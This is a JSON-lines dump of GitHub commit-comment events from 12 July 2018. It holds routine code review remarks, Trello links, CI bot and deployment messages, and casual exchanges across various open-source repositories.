{"id":"7957559516","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/UXP"},"payload":{"comment":{"id":29688158,"position":null,"line":null,"path":null,"commit_id":"53cf12d6d808c80c4ce240cbbf8d29344c8ce644","created_at":"2018-07-12T17:08:43Z","updated_at":"2018-07-12T17:08:43Z","author_association":"OWNER","body":"Tag #625"}},"created_at":"2018-07-12T17:08:43Z"}
{"id":"7957559735","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/UXP"},"payload":{"comment":{"id":29688159,"position":null,"line":null,"path":null,"commit_id":"3945eb4c1d15a3232bb340b7348006a220398ebd","created_at":"2018-07-12T17:08:46Z","updated_at":"2018-07-12T17:08:46Z","author_association":"OWNER","body":"Tag #625"}},"created_at":"2018-07-12T17:08:46Z"}
{"id":"7957559855","type":"CommitCommentEvent","actor":{"login":"songy23"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29688160,"position":6,"line":19,"path":"contrib/zpages/build.gradle","commit_id":"48f9df44957794e14680e7587d4865279b521251","created_at":"2018-07-12T17:08:47Z","updated_at":"2018-07-12T17:08:47Z","author_association":"NONE","body":"Or maybe there's something wrong with the path to the generated css file?https://stackoverflow.com/questions/41315434/setting-the-resource-folder-in-a-java-gradle-project might help."}},"created_at":"2018-07-12T17:08:47Z"}
{"id":"7957560804","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29688163,"position":null,"line":null,"path":null,"commit_id":"313b02d275a02173ef26a6755f82dfe57ca3303a","created_at":"2018-07-12T17:09:00Z","updated_at":"2018-07-12T17:09:00Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add New Member Page Functionality](https://trello.com/c/jdjKTrDb/60-add-new-member-page-functionality)"}},"created_at":"2018-07-12T17:09:00Z"}
{"id":"7957561788","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29688165,"position":null,"line":null,"path":null,"commit_id":"b0480b2fa084a810fa964f933a91ec0a906e8702","created_at":"2018-07-12T17:09:12Z","updated_at":"2018-07-12T17:09:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add New Member Page Functionality](https://trello.com/c/jdjKTrDb/60-add-new-member-page-functionality)"}},"created_at":"2018-07-12T17:09:12Z"}
{"id":"7957562758","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29688169,"position":null,"line":null,"path":null,"commit_id":"ea2c7266dabcdd81f52605f65cb1a5b3c1c60920","created_at":"2018-07-12T17:09:24Z","updated_at":"2018-07-12T17:09:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add New Member Page Functionality](https://trello.com/c/jdjKTrDb/60-add-new-member-page-functionality)"}},"created_at":"2018-07-12T17:09:24Z"}
{"id":"7957563897","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29688173,"position":null,"line":null,"path":null,"commit_id":"05bb53ef91e02a3052ebb661315c86a7b447338f","created_at":"2018-07-12T17:09:37Z","updated_at":"2018-07-12T17:09:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add New Member Page Functionality](https://trello.com/c/jdjKTrDb/60-add-new-member-page-functionality)"}},"created_at":"2018-07-12T17:09:37Z"}
{"id":"7957564840","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29688175,"position":null,"line":null,"path":null,"commit_id":"5509fe10ab837ac785689182e40c7688bf4e0d22","created_at":"2018-07-12T17:09:49Z","updated_at":"2018-07-12T17:09:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add New Member Page Functionality](https://trello.com/c/jdjKTrDb/60-add-new-member-page-functionality)"}},"created_at":"2018-07-12T17:09:49Z"}
{"id":"7957564871","type":"CommitCommentEvent","actor":{"login":"EvertonCosmo"},"repo":{"name":"EvertonCosmo/UFC"},"payload":{"comment":{"id":29688176,"position":null,"line":null,"path":null,"commit_id":"0241ad369a105c475978366ca0567077e6b3514f","created_at":"2018-07-12T17:09:49Z","updated_at":"2018-07-12T17:09:49Z","author_association":"OWNER","body":"Bank settings"}},"created_at":"2018-07-12T17:09:49Z"}
{"id":"7957565318","type":"CommitCommentEvent","actor":{"login":"jadurani"},"repo":{"name":"jadurani/beam-app"},"payload":{"comment":{"id":29688179,"position":null,"line":null,"path":null,"commit_id":"6ed0893876876317d94919b5ab1bb3c0ad34cd92","created_at":"2018-07-12T17:09:55Z","updated_at":"2018-07-12T17:09:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add New Member Page Functionality](https://trello.com/c/jdjKTrDb/60-add-new-member-page-functionality)"}},"created_at":"2018-07-12T17:09:55Z"}
{"id":"7957570232","type":"CommitCommentEvent","actor":{"login":"dmi3yy"},"repo":{"name":"evolution-cms/evolution"},"payload":{"comment":{"id":29688188,"position":null,"line":null,"path":null,"commit_id":"257734d0906ce11d8f372dd4f22182fb14b3212b","created_at":"2018-07-12T17:10:56Z","updated_at":"2018-07-12T17:10:56Z","author_association":"NONE","body":"Need all check. \nI haven’t time now :(( \n\nDo this after 23.07 \n\nNo go to holiday to sea  \n\nОтправлено с iPhone\n\n> 12 июля 2018 г., в 20:05, Mr B <notifications@github.com> написал(а):\n> \n> @dmi3yy - are these changes getting added to 1.4.x or not? The manager/includes/src/ folder and all files? Among other things they completely change where dashboard files are stored. If not then there are a couple of commits I added to dev based on this that I will need to resubmit for 1.4.x.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-12T17:10:56Z"}
{"id":"7957573637","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29688194,"position":44,"line":480,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T17:11:39Z","updated_at":"2018-07-12T17:11:39Z","author_association":"CONTRIBUTOR","body":"\"Updated **source** OTP auxiliary file: Local counter was higher.\""}},"created_at":"2018-07-12T17:11:39Z"}
{"id":"7957575731","type":"CommitCommentEvent","actor":{"login":"jameshadfield"},"repo":{"name":"nextstrain/augur"},"payload":{"comment":{"id":29688201,"position":null,"line":null,"path":null,"commit_id":"72c6fabf340263a9179cf8bbee04281429566074","created_at":"2018-07-12T17:12:07Z","updated_at":"2018-07-12T17:12:07Z","author_association":"MEMBER","body":"Hi @rneher - the problem is that `loc` was made lower case not only for matching but was also written out to the meta JSON as lower case. This caused problems in Auspice as the deme on the tree node would be \"WA\" but in the `meta.geo.state` would be \"wa\".\r\n\r\nThe change was introduced in https://github.com/nextstrain/augur/pull/161\r\n\r\nInitially I wanted to perform matching only in lower-case (commit no longer there, that's the problem with creating a \"nice history\" in git). That is, turn everything lower case when parsing the lat longs TSV and then compare `attrs[geo_field].lower()` to this, but write out `attrs[geo_field]` (which may not be lower case. After talking to @trvrb it was decided to compare things without case changes. I'm happy to go with my original plan if that suits you better?"}},"created_at":"2018-07-12T17:12:07Z"}
{"id":"7957577171","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29688203,"position":null,"line":null,"path":null,"commit_id":"7c85d4a6f9252eaed827a95f5dc72e69140ba112","created_at":"2018-07-12T17:12:24Z","updated_at":"2018-07-12T17:12:24Z","author_association":"NONE","body":"issue_6729 (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T17:12:24Z"}
{"id":"7957578400","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29688207,"position":null,"line":null,"path":null,"commit_id":"389035385abe607363391e15a98db4ebfb4447a9","created_at":"2018-07-12T17:12:40Z","updated_at":"2018-07-12T17:12:40Z","author_association":"MEMBER","body":"@vak2ve, this file looks ready for transformation batches, C, D, and then E, if you'd like to try them!"}},"created_at":"2018-07-12T17:12:40Z"}
{"id":"7957584238","type":"CommitCommentEvent","actor":{"login":"bossloper"},"repo":{"name":"evolution-cms/evolution"},"payload":{"comment":{"id":29688226,"position":null,"line":null,"path":null,"commit_id":"257734d0906ce11d8f372dd4f22182fb14b3212b","created_at":"2018-07-12T17:13:53Z","updated_at":"2018-07-12T17:13:53Z","author_association":"NONE","body":":-) ok, have a good (well deserved) holiday!"}},"created_at":"2018-07-12T17:13:53Z"}
{"id":"7957592408","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"QuiltedTuba2798/FactionsPro"},"payload":{"comment":{"id":29688248,"position":null,"line":null,"path":null,"commit_id":"b3ca0aab5fd4248315d54335312d70eab1d5656d","created_at":"2018-07-12T17:15:36Z","updated_at":"2018-07-12T17:15:36Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/QuiltedTuba2798/FactionsPro/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `3025a9a8-85f7-11e8-84ec-c1fc70604912`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-12T17:15:36Z"}
{"id":"7957592745","type":"CommitCommentEvent","actor":{"login":"nscozzaro"},"repo":{"name":"nscozzaro/physics-is-beautiful"},"payload":{"comment":{"id":29688250,"position":6,"line":597,"path":"curricula/static/curricula/style.css","commit_id":"ace2339292c9e8d3e5bf2de28b7ad96a6ff47fdf","created_at":"2018-07-12T17:15:40Z","updated_at":"2018-07-12T17:15:40Z","author_association":"OWNER","body":"*background"}},"created_at":"2018-07-12T17:15:40Z"}
{"id":"7957596851","type":"CommitCommentEvent","actor":{"login":"emkurilenko"},"repo":{"name":"emkurilenko/testJS"},"payload":{"comment":{"id":29688257,"position":21,"line":21,"path":"js/arrayTool.js","commit_id":"aa5516f2502274adbae15cdc256e4a27b190bdbe","created_at":"2018-07-12T17:16:31Z","updated_at":"2018-07-12T17:16:31Z","author_association":"OWNER","body":"@ginkomix Пашка скинул задания, так пытаюсь их делать\r\n"}},"created_at":"2018-07-12T17:16:31Z"}
{"id":"7957597729","type":"CommitCommentEvent","actor":{"login":"bennyistanto"},"repo":{"name":"bennyistanto/geodata"},"payload":{"comment":{"id":29688258,"position":null,"line":null,"path":null,"commit_id":"908eb0274a7d0a7c3a2730857182bf7f08bdc989","created_at":"2018-07-12T17:16:42Z","updated_at":"2018-07-12T17:16:42Z","author_association":"OWNER","body":"Revert to this commit"}},"created_at":"2018-07-12T17:16:42Z"}
{"id":"7957599391","type":"CommitCommentEvent","actor":{"login":"fjuma"},"repo":{"name":"fjuma/wildfly-core"},"payload":{"comment":{"id":29688261,"position":231,"line":824,"path":"elytron/src/test/java/org/wildfly/extension/elytron/KeyStoresTestCase.java","commit_id":"b0c8a0f4619adc06927d95837132653e3880788a","created_at":"2018-07-12T17:17:01Z","updated_at":"2018-07-12T17:17:01Z","author_association":"OWNER","body":"@mchoma There are already tests for revoke-certificate and should-renew-certificate here in KeyStoresTestCase."}},"created_at":"2018-07-12T17:17:01Z"}
{"id":"7957599794","type":"CommitCommentEvent","actor":{"login":"vak2ve"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29688263,"position":null,"line":null,"path":null,"commit_id":"389035385abe607363391e15a98db4ebfb4447a9","created_at":"2018-07-12T17:17:06Z","updated_at":"2018-07-12T17:17:06Z","author_association":"CONTRIBUTOR","body":"@WaxCylinderRevival I'd be happy to! Glad no new error patterns have jumped out so far :)"}},"created_at":"2018-07-12T17:17:06Z"}
{"id":"7957600163","type":"CommitCommentEvent","actor":{"login":"EndallBatan93"},"repo":{"name":"logbee/keyscore"},"payload":{"comment":{"id":29688264,"position":34,"line":48,"path":"keyscore-manager/src/app/pipelines/filters/filter-details/live-editing.component.ts","commit_id":"4305ae19844acb32c2f434e6824c9ea0837b3506","created_at":"2018-07-12T17:17:10Z","updated_at":"2018-07-12T17:17:10Z","author_association":"CONTRIBUTOR","body":"Just the default message in case the component that uses the error.componten does not override the message. \r\nI'll change it to a more fitting message."}},"created_at":"2018-07-12T17:17:10Z"}
{"id":"7957604697","type":"CommitCommentEvent","actor":{"login":"jameshadfield"},"repo":{"name":"nextstrain/augur"},"payload":{"comment":{"id":29688274,"position":null,"line":null,"path":null,"commit_id":"72c6fabf340263a9179cf8bbee04281429566074","created_at":"2018-07-12T17:18:06Z","updated_at":"2018-07-12T17:18:06Z","author_association":"MEMBER","body":"See https://github.com/nextstrain/augur/commit/dc69b86ff3e62e8b2a5fb7f2e39307425dc1df79 for lower-case matching"}},"created_at":"2018-07-12T17:18:06Z"}
{"id":"7957609648","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29688294,"position":26,"line":26,"path":"test/Splitter.js","commit_id":"835d707af380fd67fbead1b22cf6f2a04f0e624b","created_at":"2018-07-12T17:19:09Z","updated_at":"2018-07-12T17:19:09Z","author_association":"NONE","body":"You have to `return` when you want the promise to resolve.\r\n`web3.eth.makeSureHasAtLeast` is a promise too, but there is no return because:\r\n\r\n```javascript\r\n() => something\r\n```\r\nIs the equivalent of:\r\n\r\n```javascript\r\nfunction() {\r\n    return something;\r\n}\r\n```\r\nThe `return is implicit."}},"created_at":"2018-07-12T17:19:09Z"}
{"id":"7957611958","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29688306,"position":null,"line":null,"path":null,"commit_id":"f8ed1264cbd9b16e7c94a8823be15b53660e1674","created_at":"2018-07-12T17:19:39Z","updated_at":"2018-07-12T17:19:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [020 - Implementar CreateCep dentro da classe CepService](https://trello.com/c/DIRk2jH1/26-020-implementar-createcep-dentro-da-classe-cepservice)"}},"created_at":"2018-07-12T17:19:39Z"}
{"id":"7957618370","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29688325,"position":null,"line":null,"path":null,"commit_id":"b214a9e80add3f7528b7b0915e2c4a4f7ce589d7","created_at":"2018-07-12T17:21:02Z","updated_at":"2018-07-12T17:21:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [019.1 - Buscar nome do Estado](https://trello.com/c/SBhpK52G/27-0191-buscar-nome-do-estado)"}},"created_at":"2018-07-12T17:21:02Z"}
{"id":"7957620144","type":"CommitCommentEvent","actor":{"login":"sfan02"},"repo":{"name":"USEPA/EPA_Express_Code"},"payload":{"comment":{"id":29688330,"position":null,"line":null,"path":null,"commit_id":"e91143e27dcf44e492c59c720b66bdb1dd917ffa","created_at":"2018-07-12T17:21:24Z","updated_at":"2018-07-12T17:21:24Z","author_association":"CONTRIBUTOR","body":"Removed TSP, step it up. Updated accessibility."}},"created_at":"2018-07-12T17:21:24Z"}
{"id":"7957621837","type":"CommitCommentEvent","actor":{"login":"sabberworm"},"repo":{"name":"sabberworm/PHP-CSS-Parser"},"payload":{"comment":{"id":29688335,"position":10,"line":493,"path":"lib/Sabberworm/CSS/Parser.php","commit_id":"92abffafb1190d1c7d169c71e762dc1ac0f91ee4","created_at":"2018-07-12T17:21:44Z","updated_at":"2018-07-12T17:21:44Z","author_association":"OWNER","body":"@raxbg Sorry I hadn’t seen this comment before when I reviewed again. Still I’m not sure of the exception handling and don’t understand the ` !$sName || !$this->comes(']')` part of the `if`."}},"created_at":"2018-07-12T17:21:44Z"}
{"id":"7957623436","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29688337,"position":null,"line":null,"path":null,"commit_id":"c597e2264453faeb062b4f28a6e8983394d87de9","created_at":"2018-07-12T17:22:05Z","updated_at":"2018-07-12T17:22:05Z","author_association":"OWNER","body":"Thank you for writing these up. Thank you especially for stepping up where Rane and I dropped the ball on recording this particular idea. When you're happy with your edits, please make a pull request so we can merge your work back into the master branch.\r\n\r\nYou may want to insert this paragraph where it fits chronologically rather than at the top of the file."}},"created_at":"2018-07-12T17:22:05Z"}
{"id":"7957623524","type":"CommitCommentEvent","actor":{"login":"NerdOfCode"},"repo":{"name":"NerdOfCode/Restricted-Shell"},"payload":{"comment":{"id":29688339,"position":null,"line":null,"path":null,"commit_id":"3369b641bc4a7d42b52c0f07fd2a4b57631c3cc6","created_at":"2018-07-12T17:22:07Z","updated_at":"2018-07-12T17:22:07Z","author_association":"OWNER","body":"Minor changes how `run.sh` interacts with the user...\r\nAlso updated command checking to display correct results"}},"created_at":"2018-07-12T17:22:07Z"}
{"id":"7957636501","type":"CommitCommentEvent","actor":{"login":"jalovkj"},"repo":{"name":"jalovkj/website"},"payload":{"comment":{"id":29688376,"position":2,"line":5,"path":"README.md","commit_id":"aaa6c6aa1cb21c97f0c8cc1b835bc48ce68e17f8","created_at":"2018-07-12T17:24:44Z","updated_at":"2018-07-12T17:24:44Z","author_association":"OWNER","body":"## What is this for???\r\n\r\nPlease explain this line better."}},"created_at":"2018-07-12T17:24:44Z"}
{"id":"7957656513","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29688436,"position":null,"line":null,"path":null,"commit_id":"64e57e80038031c45244644cfb20857ca750c64e","created_at":"2018-07-12T17:28:45Z","updated_at":"2018-07-12T17:28:45Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-172844 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-172844\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T17:28:45Z"}
{"id":"7957658648","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29688440,"position":null,"line":null,"path":null,"commit_id":"8acd661aab4e223e68d55da87322436ef59ed57f","created_at":"2018-07-12T17:29:12Z","updated_at":"2018-07-12T17:29:12Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/wpt-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/wpt-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/wpt-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/wpt-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/wpt-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/wpt-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/wpt-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/wpt-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/wpt-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/N9ctwzQ9QvaulYRJBrvX_Q\",\n            \"queue:schedule-task:taskcluster-github/N9ctwzQ9QvaulYRJBrvX_Q/LANV7zlHQpCoqqVd0o6eng\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:repo:github.com/bocoup/wpt:branch:master\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:index.garbage.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/wpt-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/wpt-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/wpt-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/wpt-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/wpt-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/wpt-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/wpt-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/wpt-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/wpt-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/N9ctwzQ9QvaulYRJBrvX_Q\",\n                \"queue:schedule-task:taskcluster-github/N9ctwzQ9QvaulYRJBrvX_Q/LANV7zlHQpCoqqVd0o6eng\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-12T17:29:11.834Z\n\n</details>"}},"created_at":"2018-07-12T17:29:12Z"}
{"id":"7957665807","type":"CommitCommentEvent","actor":{"login":"RichardFourie"},"repo":{"name":"electrumpayments/service-interface-base"},"payload":{"comment":{"id":29688461,"position":null,"line":null,"path":null,"commit_id":"86f2b5b54af3b89d55cbe57ca0d94fb92a6e4ba9","created_at":"2018-07-12T17:30:38Z","updated_at":"2018-07-12T17:30:38Z","author_association":"NONE","body":"This will break some projects and will make the Contour project impossible to complete."}},"created_at":"2018-07-12T17:30:38Z"}
{"id":"7957666896","type":"CommitCommentEvent","actor":{"login":"SarahJerez18H"},"repo":{"name":"Sisterlu/EjemploNetBeans"},"payload":{"comment":{"id":29688464,"position":6,"line":11,"path":"EjemploGitHub/src/ejemplogithub/EjemploGitHub.java","commit_id":"9ce44c0d6936405f6648a6bccd723abbacd2899f","created_at":"2018-07-12T17:30:51Z","updated_at":"2018-07-12T17:30:51Z","author_association":"COLLABORATOR","body":"Dora"}},"created_at":"2018-07-12T17:30:51Z"}
{"id":"7957673135","type":"CommitCommentEvent","actor":{"login":"PedroSamuel"},"repo":{"name":"PedroSamuel/JobAdsProject"},"payload":{"comment":{"id":29688490,"position":null,"line":null,"path":null,"commit_id":"2f5f3dd9f802f2d0bf85828462d093b9687716a5","created_at":"2018-07-12T17:32:06Z","updated_at":"2018-07-12T17:32:06Z","author_association":"OWNER","body":"."}},"created_at":"2018-07-12T17:32:06Z"}
{"id":"7957677147","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29688508,"position":null,"line":null,"path":null,"commit_id":"09ebe3416c185dc194209528608bf25709c97b2c","created_at":"2018-07-12T17:32:54Z","updated_at":"2018-07-12T17:32:54Z","author_association":"OWNER","body":"Thank you for composing, recording and uploading these. I have a couple of housekeeping suggestions:\r\n\r\n1. I like to use all lower case in file names, with no punctuation. Spaces in particular create problems for automated processing.\r\n2. Rather than dropping the music in the root directory, I'd put it in `characters/` next to `.md` files that have textual descriptions of the characters.\r\n3. Unless there are multiple recordings for a particular character, I'd consider simply using the character's name as the filename. `Ben The Buyer Melody.m4a` would become `ben.m4a`, right next to `ben.md`."}},"created_at":"2018-07-12T17:32:54Z"}
{"id":"7957680554","type":"CommitCommentEvent","actor":{"login":"zambamingi"},"repo":{"name":"baldurk/renderdoc"},"payload":{"comment":{"id":29688530,"position":22,"line":402,"path":"renderdoc/driver/dxgi/dxgi_wrapped.cpp","commit_id":"98a6bb56ca5ecc976aab3b510ffa3d1daf2816fa","created_at":"2018-07-12T17:33:36Z","updated_at":"2018-07-12T17:33:36Z","author_association":"NONE","body":"Can you explain why IUnknown is not allowed?  Why are these the only UUID's which are allowed in GetBuffer?  I believe the DXRuntime is not so restrictive.  I have an application that uses GetBuffer API and passes IUnknown and fails to capture because of this error and early return.  The app cannot be shared unfortunately so I'm trying to understand this code to see if I can find a fix in RenderDoc on my own."}},"created_at":"2018-07-12T17:33:36Z"}
{"id":"7957681143","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29688532,"position":null,"line":null,"path":null,"commit_id":"5c753fade9eb4da83573a3b575fb817dd464ad95","created_at":"2018-07-12T17:33:43Z","updated_at":"2018-07-12T17:33:43Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-173343 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-173343\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T17:33:43Z"}
{"id":"7957681532","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"skeeto/emacsql"},"payload":{"comment":{"id":29688533,"position":null,"line":null,"path":null,"commit_id":"3b70e8f5dd6cc127b68d039772e2818eee49a5d2","created_at":"2018-07-12T17:33:48Z","updated_at":"2018-07-12T17:33:48Z","author_association":"NONE","body":"Curious, would `prin1` or `prin1-to-string` be useful for this?"}},"created_at":"2018-07-12T17:33:48Z"}
{"id":"7957686138","type":"CommitCommentEvent","actor":{"login":"bianavic"},"repo":{"name":"bianavic/helloword-ex"},"payload":{"comment":{"id":29688535,"position":null,"line":null,"path":null,"commit_id":"7841f69f82b70b4c7312b631d56a4fa2d931bdbc","created_at":"2018-07-12T17:34:46Z","updated_at":"2018-07-12T17:34:46Z","author_association":"OWNER","body":"![radia perlman](https://user-images.githubusercontent.com/38224433/42649663-a8b55d80-85e0-11e8-8be5-fd86d954b7ba.jpeg)\r\n![carol shaw](https://user-images.githubusercontent.com/38224433/42649664-a90619c8-85e0-11e8-80f3-9d0550471a7c.jpg)\r\n![irma mary kenneth](https://user-images.githubusercontent.com/38224433/42649665-a92d7ec8-85e0-11e8-9eb0-da5d2a7abb9a.jpg)\r\n![hedy lamarr](https://user-images.githubusercontent.com/38224433/42649666-a95937b6-85e0-11e8-830a-4ac9dd69247b.jpg)\r\n![ada lovelace](https://user-images.githubusercontent.com/38224433/42649668-a980bc82-85e0-11e8-8e26-0b6b617e88f9.jpg)\r\n![grace hooper](https://user-images.githubusercontent.com/38224433/42649669-a9a7b5f8-85e0-11e8-89fa-4a39f0e96dd9.jpg)\r\n"}},"created_at":"2018-07-12T17:34:46Z"}
{"id":"7957688230","type":"CommitCommentEvent","actor":{"login":"peacepirate"},"repo":{"name":"Kotlin/anko"},"payload":{"comment":{"id":29688540,"position":null,"line":null,"path":null,"commit_id":"7c1aeb7da23613b30902d667193531d2e1fe52d2","created_at":"2018-07-12T17:35:14Z","updated_at":"2018-07-12T17:35:14Z","author_association":"NONE","body":"Anko 10.6 is throwing error being not resolved.\r\nhttps://jcenter.bintray.com/org/jetbrains/anko/anko-common/ only contains 10.5, is there a reason why it was pre-emptively bumped to 10.6?"}},"created_at":"2018-07-12T17:35:14Z"}
